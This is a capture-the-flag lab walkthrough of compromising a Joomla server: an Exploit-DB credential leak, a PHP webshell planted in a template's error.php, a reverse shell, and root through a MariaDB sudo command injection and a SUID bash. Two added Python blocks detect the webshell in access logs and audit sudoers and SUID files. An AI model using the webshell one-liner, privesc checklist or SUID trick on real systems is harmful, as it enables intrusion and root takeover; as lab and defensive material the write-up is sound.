
HackSmarter Samurai Walkthrough

Summary:

In this lab, we start by enumerating the target and discovering that it is running Joomla. Using joomscan, we identify the exact version and find a known unauthenticated information disclosure vulnerability (Exploit-DB 51334) that lets us dump credentials from the database. We use those credentials to log in to the Joomla admin panel and achieve Remote Code Execution by modifying a template file. From there, we get a reverse shell as www-data and stabilize it. During privilege escalation, we discover that our user can run MariaDB as root without a password. We abuse a command injection in the database name parameter to execute commands as root, set the SUID bit on /bin/bash, and finally use the GTFOBins technique to spawn a root shell and capture the flag.

Enumeration:

First, we start with an nmap scan:


We see two ports open, SSH and 80. Let's visit the website:


Nothing really useful, just a simple static web page. The source code doesn't hold any sensitive information, so all we can really do is fuzz for other endpoints: start with directories, then files, then subdomains.


We do find multiple plugins and themes, so a CMS is definitely in place, and it turns out to be Joomla.


Most directories return 404 or blank pages, but we do find the admin portal:


I tried common usernames and passwords, but that didn't work. Now let's use a tool to scan the website; maybe we will get a version or something. For this I will be using joomscan:

sudo apt install joomscan
joomscan -u http://$target


Exploitation:

Great, now we have the version. If we search for exploits for this specific version, we will find this one:

https://www.exploit-db.com/exploits/51334

It is an unauthenticated information disclosure that we can use to dump credentials and then log in with them.


To use it, we first need to install some gems; you will find them all listed at the top of the exploit.

vim exploit.rb ==> Then paste your exploit
chmod +x exploit.rb
sudo gem install paint httpx docopt
./exploit.rb


Now we just run it and provide the URL:


Just like that, we dump the username and the DB password. We can try the username Miyamoto with the DB password to see if we can log in, and we do.

Now the first thing we should think about is how to get RCE from the admin panel.

I already have these steps in my web app methodology to get RCE:

==> Attacking Joomla:
+ Say we brute-forced the login and got admin access; we can go to:
http://$target/administrator
+ Then we just modify a template, just like with WP:
+ Go to System, then Templates, then modify error.php to add this one-liner:
system($_GET['cmd']);
+ Then a simple curl will trigger it:
curl http://$target/templates/cassiopeia/error.php?cmd=id
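From the defender's side, the two steps above leave a distinctive trace in the web server log: an authenticated POST to the template manager, followed by direct requests to a .php file under /templates/ carrying a command-style parameter. The following is an added example (not from the original post) that flags both patterns over constructed access log lines; the parameter names and the log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access log lines (not captured from the lab).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "POST /administrator/index.php?option=com_templates&task=template.apply HTTP/1.1" 303 0 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:01:15 +0000] "GET /templates/cassiopeia/error.php?cmd=id HTTP/1.1" 200 63 "-" "curl/8.4.0"
10.0.0.5 - - [12/Mar/2024:10:01:20 +0000] "GET /templates/cassiopeia/error.php?cmd=bash%20-c%20%27id%27 HTTP/1.1" 200 63 "-" "curl/8.4.0"
10.0.0.9 - - [12/Mar/2024:10:02:00 +0000] "GET /templates/cassiopeia/css/template.min.css HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# Joomla renders templates through index.php; a .php file under /templates/ fetched directly,
# with a parameter that looks like a command, is the webshell pattern the error.php edit creates.
TEMPLATE_PHP_RE = re.compile(r'^/templates/[^/]+/.*\.php$')
COMMAND_PARAMS = {"cmd", "c", "exec", "command"}  # assumed names, extend to taste

def parse_line(line: str):
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    return {"ip": m["ip"], "ts": m["ts"], "method": m["method"], "path": parts.path,
            "params": parse_qs(parts.query), "status": int(m["status"])}

def flag_template_webshell(log_text: str) -> list:
    """One finding per direct request to a template .php file carrying a command-style parameter."""
    findings = []
    for line in log_text.splitlines():
        req = parse_line(line)
        if req and TEMPLATE_PHP_RE.match(req["path"]):
            hit = sorted(COMMAND_PARAMS.intersection(req["params"]))
            if hit:
                findings.append({"ip": req["ip"], "ts": req["ts"], "path": req["path"],
                                 "param": hit[0], "value": req["params"][hit[0]][0]})
    return findings

def flag_template_edits(log_text: str) -> list:
    """Admin-side template edits (com_templates POSTs), to correlate with the webshell hits."""
    return [req for req in map(parse_line, log_text.splitlines())
            if req and req["method"] == "POST" and req["path"].startswith("/administrator/")
            and req["params"].get("option") == ["com_templates"]]
```

Correlating a com_templates POST with later hits on the same template's .php file from the same source IP is the strongest signal; a lone request to error.php with a query string is already worth an alert.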


Now a simple curl gets us RCE; let's try to get a full reverse shell. For this we can use the revshells website. This time the machine already has python, but I still preferred using a bash reverse shell; you can choose anything you want (if the command doesn't work, URL-encode the payload first).


In my case, I had some trouble due to zsh misinterpreting my payload, so I decided to put the payload in a file, host it, fetch it from the server and finally execute it to get our reverse shell.


Perfect, now all we need to do is stabilize our shell to be able to privesc easily.

python3 -c 'import pty;pty.spawn("/bin/bash")'
stty -a : this gives us the rows and columns.
Ctrl+Z : background the shell.
stty raw -echo; fg
stty rows number_of_rows cols number_of_columns
export TERM=xterm-256color
PS1='\[\e[31m\]\u\[\e[96m\]@\[\e[35m\]\H\[\e[0m\]:\[\e[93m\]\w\[\e[0m\]\$'

Or : PS1='\[\e[31m\]\u\[\e[96m\]@\[\e[35m\]\H\[\e[0m\]:\[\e[93m\]\w\[\e[0m\]\$ '


Nice, now we've got a stable shell we can use to privesc.

Privilege Escalation:

Before I start importing linpeas, I always like testing things manually first. For websites running a CMS, it's always good to check the config files for DB creds, but in our case we already had those. Now let's first check for the quick wins:

id : check which user we are and our groups.
cat /etc/passwd : check for other users on the machine.
sudo -l : which programs can be run with root permissions.
uname -sr / lsb_release -a : version + architecture.
find / -type f -perm -04000 -ls 2>/dev/null : find binaries with SUID.
Check the bash history.
If we can write into a file that gets executed as another user, always put a revshell there.
If you get creds, always test for password reuse.
cat /etc/fstab : check if there is an NFS share.
sudo -V : check the sudo version for privesc.

# Kernel PrivEsc :
uname -a : check the kernel version and whether it has privesc vectors.

We find that our user can execute the MariaDB binary as root without a password.


Now, if we run the binary, we're asked for a database name:


Since we're dealing with DB names, let's try some basic SQLi. First I tried calling a DB that didn't exist, which returned an error; then I commented out everything after it and got a valid SQLi.


Now let's see if we can add the command we want to execute, comment out the rest, and check whether we actually have command injection as well.


And we do! Now we can execute anything as the root user. Let’s use that to set the SUID bit on /bin/bash and then use GTFOBins to get a root shell.

chmod +s /bin/bash ==> make /bin/bash SUID
bash -p : spawn a root shell by abusing the SUID bit on bash, as documented on GTFOBins.
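Both halves of this privesc chain are things a host audit should catch before an attacker does: a NOPASSWD sudo rule pointing at a binary that can spawn a shell (the MariaDB client here, as the checklist's `sudo -l` step reveals), and a SUID bit appearing on a binary that is not in the known-good baseline (the `find / -perm -04000` step). The following is an added example, not code from the original post, with a constructed sudoers sample and a constructed mini filesystem; the shell-escape list is an assumed subset of GTFOBins.

```python
import os, stat, tempfile

# Subset of binaries that hand the caller a shell when run under sudo (GTFOBins "sudo"
# category; mariadb/mysql are the ones this lab abuses). Assumed list, not exhaustive.
SHELL_ESCAPE_BINARIES = {"mariadb", "mysql", "bash", "sh", "vim", "less", "find", "python3", "perl"}

# Constructed sudoers sample, not the lab's real file.
SAMPLE_SUDOERS = """\
%sudo ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: /usr/bin/mariadb
alice ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart apache2
bob ALL=(ALL) NOPASSWD: ALL
"""

def audit_sudoers(text: str) -> list:
    """Flag NOPASSWD rules whose command is ALL or a known shell-escape binary."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if "NOPASSWD:" not in line or "=" not in line:
            continue
        user, spec = line.split("=", 1)               # "www-data ALL" / "(ALL) NOPASSWD: /usr/bin/mariadb"
        for cmd in spec.split("NOPASSWD:", 1)[1].split(","):
            prog = cmd.split()[0] if cmd.split() else ""
            if prog == "ALL" or os.path.basename(prog) in SHELL_ESCAPE_BINARIES:
                findings.append({"user": user.split()[0], "command": prog})
    return findings

def unexpected_suid(root: str, baseline: set) -> list:
    """Return SUID regular files under `root` (paths relative to root) that are not in the baseline."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            st = os.lstat(full)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and rel not in baseline:
                found.append(rel)
    return sorted(found)

def demo_suid_check() -> list:
    """Build a constructed mini filesystem where bin/bash has been chmod +s'd, then scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "bin"))
        for name, mode in (("bash", 0o4755), ("ls", 0o755), ("passwd", 0o4755)):
            path = os.path.join(tmp, "bin", name)
            open(path, "w").close()
            os.chmod(path, mode)
        return unexpected_suid(tmp, baseline={"bin/passwd"})  # passwd is expected SUID, bash is not
```

On a real host, run unexpected_suid against "/" with a baseline captured at build time, and feed audit_sudoers the output of `visudo -c -f` or the files under /etc/sudoers.d.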


Just like that, we are root. Now just go to the root directory and get the flag:


That was everything for this lab; hope you found it useful.

This post is licensed under CC BY 4.0 by the author.